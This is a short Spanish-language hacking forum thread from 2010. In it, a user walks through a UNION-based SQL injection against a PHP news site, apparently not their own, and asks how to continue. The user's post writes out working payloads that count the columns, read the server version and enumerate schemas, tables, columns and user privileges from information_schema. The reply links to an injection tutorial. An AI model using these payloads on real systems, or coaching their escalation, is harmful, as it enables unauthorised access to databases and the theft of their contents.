|
Título: Inyección en sistema de noticias Publicado por: Servia en 21 Marzo 2010, 10:09 am Hola, me ha dado por probar un sistema de noticias en php y he empezado a hacer pruebas y creo que estoy dando con algo
Cuando se visualiza una noticia con normalidad: (http://r.i.elhacker.net/cache?url=http://img696.imageshack.us/img696/3672/alertpaybuxnot.png) Cuando se intenta visualizar una noticia que no existe (una id.) (http://r.i.elhacker.net/cache?url=http://img44.imageshack.us/img44/3672/alertpaybuxnot.png) (Fijarse que la comilla y los // son de cuando Nota de Prensa, Algún Sitio (ejemplo)) - 1/02/2009 He hecho union all select y llego hasta el 11 o sea que la tabla noticias tiene 11 campos y como se puede ver si genero un error, uno de ellos como no es el id. Cuando hago -1 union all select 1,2,3,4,5,6,7,8,9,10,11-- Me sale esto: (http://r.i.elhacker.net/cache?url=http://img707.imageshack.us/img707/1790/alertpaybuxnotq.png) Si pongo en vez de 1,2,3... 1,@@version,3.... me sale la versión del servidor en el primer numero: 15.0.77 He usado esto para ver las columnas: -1 union all select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns-- y me muestra esto (http://r.i.elhacker.net/cache?url=http://img511.imageshack.us/img511/2986/alertpaybuxnotm.png) Si hago esto para ver las dbs: -1 union all select 1,schema_name,3,4,5,6,7,8,9,10,11 FROM information_schema.schemata-- Me sale esto: (http://r.i.elhacker.net/cache?url=http://img403.imageshack.us/img403/9871/alertpaybuxnott.png) He intentado ver una lista de privilegios con: -1 union all select 1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11 FROM+information_schema.user_privileges-- Sale esto: (http://r.i.elhacker.net/cache?url=http://img256.imageshack.us/img256/8281/alertpaybuxnotv.png) Usando el PonyMagic (que maravilla por dios.) me indica que tiene 2 tablas y una de ellas es la de noticias y me indica todos los campos. Con esto que se puedo hacer algo? Como sigo adelante sino? Título: Re: Inyección en sistema de noticias Publicado por: Shell Root en 21 Marzo 2010, 19:51 pm Leeté tutoriales, como esté: http://foro.elhacker.net/nivel_web/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html
|